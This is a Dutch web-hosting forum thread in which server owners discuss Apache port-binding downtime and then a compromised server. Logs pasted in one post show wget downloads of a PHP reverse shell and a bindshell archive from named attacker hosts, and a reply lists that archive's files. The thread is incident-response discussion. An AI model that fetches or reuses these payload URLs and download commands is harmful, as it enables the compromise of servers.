Likes Likes:  0
Resultaten 1 tot 8 van de 8
Geen
  1. #1
    [Plesk/Algemeen] - Nooit meer "adress already in use"-downtime
    geregistreerd gebruiker
    147 Berichten
    Ingeschreven
    24/11/07

    Locatie
    Rotterdam

    Post Thanks / Like
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    0 Berichten zijn liked


    Registrar SIDN: ja
    KvK nummer: nvt
    Ondernemingsnummer: nvt

    Thread Starter

    [Plesk/Algemeen] - Nooit meer "adress already in use"-downtime

    Ik heb van 2002 tot 2007 zo'n 6 a 7x downtime (steeds max. 30min) gehad door de volgende foutmelding!

    Issue:
    Code:
    /etc/init.d/httpd restart
    Stopping httpd: [FAILED]
    Starting httpd: (98)Address already in use: make_sock: could not bind to address 0.0.0.0:443
    no listening sockets available, shutting down
    Oplossing:
    Code:
    fuser tcp/80
    kill -9 323 232 102 1932 1820
    service httpd start
    (waarbij deze getallen pid's zijn)

    Echter mijn vraag aan jullie! Met SIM wordt HTTP niet automatisch gefixed. Is er software welke zorgt dat dit soort downtime niet meer voorkomt?

  2. #2
    [Plesk/Algemeen] - Nooit meer "adress already in use"-downtime
    geregistreerd gebruiker
    961 Berichten
    Ingeschreven
    02/05/04

    Locatie
    Montreal, Canada

    Post Thanks / Like
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    0 Berichten zijn liked


    Registrar SIDN: Ja
    KvK nummer: nvt
    Ondernemingsnummer: 873411853

    Als je dat voorhebt ga je best op zoek naar de oorzaak, vaak een lek script / shell exploit / irc bot... Gewoon killen zonder meer is zinloos, je moet echt ook nog gegevens verzamene omtrend de locatie dan de scripts in de processen etc.

    /usr/sbin/lsof -prnummer kan je een hint geven van de locatie. Daarna kan je aan de hand van de aanmaak datum van het bestand je logs doorsnuffelen.

    grep 'datum' /var/www/vhosts/*/statistics/logs/access_log

  3. #3
    [Plesk/Algemeen] - Nooit meer "adress already in use"-downtime
    newbie
    157 Berichten
    Ingeschreven
    13/08/07

    Locatie
    Sluis/Terneuzen: 22062421

    Post Thanks / Like
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    0 Berichten zijn liked


    Naam: Kees van Sante
    Bedrijf: ICT Solutions Zeeland
    Functie: Eigenaar
    URL: http://ictsolutions-zeeland.nl/
    Registrar SIDN: nee
    KvK nummer: 22062421
    Ondernemingsnummer: nvt

    Ik heb de afgelopen dagen hezefde probleem, ook in mijn logs paar vreemde zaken, hoe kan ik dit oplossen, ben nu al paar keer down door dit.

    dit bijvoorbeeld:


    HTML Code:
    Mar  4 17:32:47 server1 kernel: Bluetooth: Core ver 2.10
    Mar  4 17:32:47 server1 kernel: NET: Registered protocol family 31
    Mar  4 17:32:47 server1 kernel: Bluetooth: HCI device and connection manager initialized
    Mar  4 17:32:47 server1 kernel: Bluetooth: HCI socket layer initialized
    Mar  4 17:32:47 server1 kernel: Bluetooth: L2CAP ver 2.8
    Mar  4 17:32:47 server1 kernel: Bluetooth: L2CAP socket layer initialized
    Mar  4 17:32:47 server1 kernel: Bluetooth: HIDP (Human Interface Emulation) ver 1.1
    Mar  4 17:32:47 server1 kernel: NET: Registered protocol family 10
    Mar  4 17:32:47 server1 kernel: lo: Disabled Privacy Extensions
    Mar  4 17:32:47 server1 kernel: IPv6 over IPv4 tunneling driver

    dit:

    HTML Code:
     0 20823    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0
    100 20823  100 20823    0     0  1367k      0 --:--:-- --:--:-- --:--:-- 2541k
    rm: cannot remove `d.txt*': No such file or directory
    --16:23:34--  http://www.iasi-hack.007sites.com/ku.txt
    Resolving www.iasi-hack.007sites.com... 216.86.144.57
    Connecting to www.iasi-hack.007sites.com|216.86.144.57|:80... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: 5683 (5.5K) [text/plain]
    Saving to: `/tmp/ku.txt'
    
         0K .....                                                 100% 8.40K=0.7s
    
    16:23:35 (8.40 KB/s) - `/tmp/ku.txt' saved [5683/5683]
    
    [Tue Mar 03 16:41:24 2009] [error] [client 81.175.94.130] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind:)
    [Tue Mar 03 18:44:23 2009] [error] [client 81.175.94.130] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind:)
    [Tue Mar 03 22:12:17 2009] [error] [client 64.1.215.162] File does not exist: /var/www/html/robots.txt
    [Tue Mar 03 22:12:17 2009] [error] [client 64.1.215.162] File does not exist: /var/www/html/404.shtml
    [Tue Mar 03 22:29:00 2009] [error] [client 66.90.103.116] File does not exist: /var/www/html/jmx-console
    [Tue Mar 03 22:29:00 2009] [error] [client 66.90.103.116] File does not exist: /var/www/html/404.shtml
    [Wed Mar 04 00:10:01 2009] [notice] SIGHUP received.  Attempting to restart
    [Wed Mar 04 00:10:02 2009] [warn] RSA server certificate CommonName (CN) `localhost' does NOT match server name!?
    [Wed Mar 04 00:10:02 2009] [notice] Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8b DAV/2 PHP/5.2.6 configured -- resuming normal operations
    [Wed Mar 04 00:11:01 2009] [notice] caught SIGTERM, shutting down
    --00:27:08--  http://ebise.org/eek/bomb.tar.gz
    --00:27:08--  http://ebise.org/eek/bomb.tar.gz
    Resolving ebise.org... Resolving ebise.org... 68.180.151.74
    Connecting to ebise.org|68.180.151.74|:80... 68.180.151.74
    Connecting to ebise.org|68.180.151.74|:80... connected.
    connected.
    HTTP request sent, awaiting response... HTTP request sent, awaiting response... 200 OK
    Length: 825 [application/x-gzip]
    Saving to: `bomb.tar.gz'
    
         0K                                                       100% 64.2M=0s
    
    00:27:09 (64.2 MB/s) - `bomb.tar.gz' saved [825/825]
    
    200 OK
    Length: 825 [application/x-gzip]
    Saving to: `bomb.tar.gz'
    
         0K                                                       100% 59.1M=0s
    
    00:27:09 (59.1 MB/s) - `bomb.tar.gz' saved [825/825]
    
    whois: no process killed
    [Wed Mar 04 17:32:53 2009] [warn] RSA server certificate CommonName (CN) `localhost' does NOT match server name!?
    [Wed Mar 04 17:32:53 2009] [notice] suEXEC mechanism enabled (wrapper: /usr/sbin/suexec)
    [Wed Mar 04 17:32:54 2009] [warn] RSA server certificate CommonName (CN) `localhost' does NOT match server name!?
    [Wed Mar 04 17:32:54 2009] [notice] Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8b DAV/2 PHP/5.2.6 configured -- resuming normal operations
    ziet eruit als een hack.

    Heb zojuist de tmp met dat ku.text leeg gegooid, schijnt dus een php-reverse-shell progje te zijn.

    Ben benieuwd of mijn server wel veilig is.

  4. #4
    [Plesk/Algemeen] - Nooit meer "adress already in use"-downtime
    Programmeur / Hoster
    3.952 Berichten
    Ingeschreven
    20/06/06

    Locatie
    Wijlre

    Post Thanks / Like
    Mentioned
    28 Post(s)
    Tagged
    0 Thread(s)
    647 Berichten zijn liked


    Naam: John Timmer
    Bedrijf: SystemDeveloper.NL
    Functie: Eigenaar
    URL: www.systemdeveloper.nl
    KvK nummer: 14083066
    View johntimmer's profile on LinkedIn

    Lijkt erop dat je ook een rootkit van een 60+meg kado hebt gekregen, dus ik zou nog maar even doorspeuren

    Edit: ok, beetje mis gekeken, geen 60+ mb. Maar ik zou toch verder speuren hoe het erop komt.
    SystemDeveloper.NL - 64BitsWebhosting.EU : Softwareontwikkeling & Hosting freaks

  5. #5
    [Plesk/Algemeen] - Nooit meer "adress already in use"-downtime
    geregistreerd gebruiker
    676 Berichten
    Ingeschreven
    22/01/09

    Locatie
    Eindhoven

    Post Thanks / Like
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    0 Berichten zijn liked


    Registrar SIDN: nee
    KvK nummer: nvt
    Ondernemingsnummer: nvt

    Citaat Oorspronkelijk geplaatst door sante140 Bekijk Berichten
    ziet eruit als een hack.

    Heb zojuist de tmp met dat ku.text leeg gegooid, schijnt dus een php-reverse-shell progje te zijn.

    Ben benieuwd of mijn server wel veilig is.

    Nja, zie de source van die bomb.tar.gz

    $ tar zxvf bomb.tar.gz
    x www/
    x www/whois.c
    x www/httpd.sh
    x www/inst.sh

    whois.c is een simpele code om een bindshell actig iets te creeren waarmee ze zonder user/passwd in kunnen loggen onder je www / apache ID.

    Lijkt me verstandig om je systeem te checken op rootkits en andere troep.
    Reinstall ze!

    //edit topic is uit 2007 ?!

  6. #6
    [Plesk/Algemeen] - Nooit meer "adress already in use"-downtime
    newbie
    157 Berichten
    Ingeschreven
    13/08/07

    Locatie
    Sluis/Terneuzen: 22062421

    Post Thanks / Like
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    0 Berichten zijn liked


    Naam: Kees van Sante
    Bedrijf: ICT Solutions Zeeland
    Functie: Eigenaar
    URL: http://ictsolutions-zeeland.nl/
    Registrar SIDN: nee
    KvK nummer: 22062421
    Ondernemingsnummer: nvt

    Exclamation

    2007 of niet, is toch weer actueel zoals je ziet

    ik heb die bomb.tar.gz gevonden , was uitgepakt in mijn tmp, samen met een bind directory, meer heb ik echter niet kinnen vinden, heb ze nu even hernoemd naar iets anders via putty.

    Hoe kan ik mezelf beveiligen tegen zulke grappen?

    of zetten ze soms gewoon mijn poorten open, zie ook dit net in mijn logs:



    HTML Code:
    009:03:01-04:20:01: Reset all commaand Received
    2009:03:01-04:20:01: Reset admin type:3
    2009:03:01-04:20:01: Reset admin done
    2009:03:01-04:21:01: Tally All Begin
    2009:03:01-04:21:01: Tally Reseller admin Begin
    2009:03:01-04:21:01: Tally User admin Begin
    2009:03:01-04:21:02: Tally User admin Complete
    2009:03:01-04:21:02: Tally Reseller admin Complete
    2009:03:01-04:21:02: Tally All Complete
    2009:03:01-04:22:02: httpd restarted
    2009:03:01-05:00:01: Running Backup: type=admin owner=admin id=1
    2009:03:01-15:43:01: named reloaded
    2009:03:02-00:10:01: Tally All Begin
    2009:03:02-00:10:01: Tally Reseller admin Begin
    2009:03:02-00:10:01: Tally User admin Begin
    2009:03:02-00:10:02: Tally User admin Complete
    2009:03:02-00:10:02: Tally Reseller admin Complete
    2009:03:02-00:10:02: Tally All Complete
    2009:03:02-00:11:02: httpd restarted
    2009:03:02-05:00:01: Running Backup: type=admin owner=admin id=1
    2009:03:03-00:10:01: Tally All Begin
    2009:03:03-00:10:01: Tally Reseller admin Begin
    2009:03:03-00:10:01: Tally User admin Begin
    2009:03:03-00:10:03: Tally User admin Complete
    2009:03:03-00:10:03: Tally Reseller admin Complete
    2009:03:03-00:10:03: Tally All Complete
    2009:03:03-05:00:01: Running Backup: type=admin owner=admin id=1
    2009:03:03-11:27:22: signal TERM received. Waiting for children to exit
    2009:03:03-11:27:22: Clean shutdown successful
    2009:03:03-11:30:51: signal TERM received. Waiting for children to exit
    2009:03:03-11:30:51: Clean shutdown successful
    2009:03:03-11:33:02: named started
    2009:03:04-00:10:01: Tally All Begin
    2009:03:04-00:10:01: Tally Reseller admin Begin
    2009:03:04-00:10:01: Tally User admin Begin
    2009:03:04-00:10:04: Tally User admin Complete
    2009:03:04-00:10:04: Tally Reseller admin Complete
    2009:03:04-00:10:04: Tally All Complete
    2009:03:04-05:00:01: Running Backup: type=admin owner=admin id=1
    2009:03:04-17:31:09: signal TERM received. Waiting for children to exit
    2009:03:04-17:31:09: Clean shutdown successful
    2009:03:04-17:33:02: named started
    2009:03:04-18:18:02: signal TERM received. Waiting for children to exit
    2009:03:04-18:18:02: Clean shutdown successful
    2009:03:04-18:18:02: directadmin restarted
    2009:03:04-21:59:02: httpd restarted

  7. #7
    [Plesk/Algemeen] - Nooit meer "adress already in use"-downtime
    moderator
    7.022 Berichten
    Ingeschreven
    29/07/03

    Locatie
    Nijmegen

    Post Thanks / Like
    Mentioned
    12 Post(s)
    Tagged
    0 Thread(s)
    175 Berichten zijn liked


    Naam: Mike
    Bedrijf: admin.nu
    URL: www.admin.nu
    Registrar SIDN: Ja
    KvK nummer: 09139651

    gewoon een stukje directadmin log, verder aan te raden om een fatsoenlijke beheerder voor je machine te zoeken. Want je kunt wel raden, dit gaat van kwaad tot erger. Verder zal niemand gek genoeg zijn om stap voor stap een uitleg op te gaan schrijven wat te doen. Elke situatie is anders.
    "Zo zijn ook wij één leverancier. Dé leverancier in gedegen Linux kennis, wanneer jij dat nodig hebt."
    Boek je admin vandaag nog via : www.admin.nu
    Gevestigd in Nederland en Moldavië

    Lees hier de webhostingtalk.nl forum regels en voorwaarden!

  8. #8
    [Plesk/Algemeen] - Nooit meer "adress already in use"-downtime
    geregistreerd gebruiker
    676 Berichten
    Ingeschreven
    22/01/09

    Locatie
    Eindhoven

    Post Thanks / Like
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    0 Berichten zijn liked


    Registrar SIDN: nee
    KvK nummer: nvt
    Ondernemingsnummer: nvt

    Idd zoals Mikey al aangaf, eens systeembeheerder is wel een must voor als je geen clue hebt waar je mee bezig bent. (nofi)
    Een tijdelijke oplossing zou een firewall kunnen zijn welke alleen daemons in/out op vaste/statische (http op 80, ssh op 22 etc) poorten laat binden. Je wilt niet dat ze een shell (van bomb.tar.gz) genaamd httpd onder het www/httpd ID hebben draaien en je doos nog verder vernaggelen.

    suc6 met reinstallen !

Webhostingtalk.nl

Contact

  • Rokin 113-115
  • 1012 KP, Amsterdam
  • Nederland
  • Contact
© Copyright 2001-2026 Webhostingtalk.nl.
Web Statistics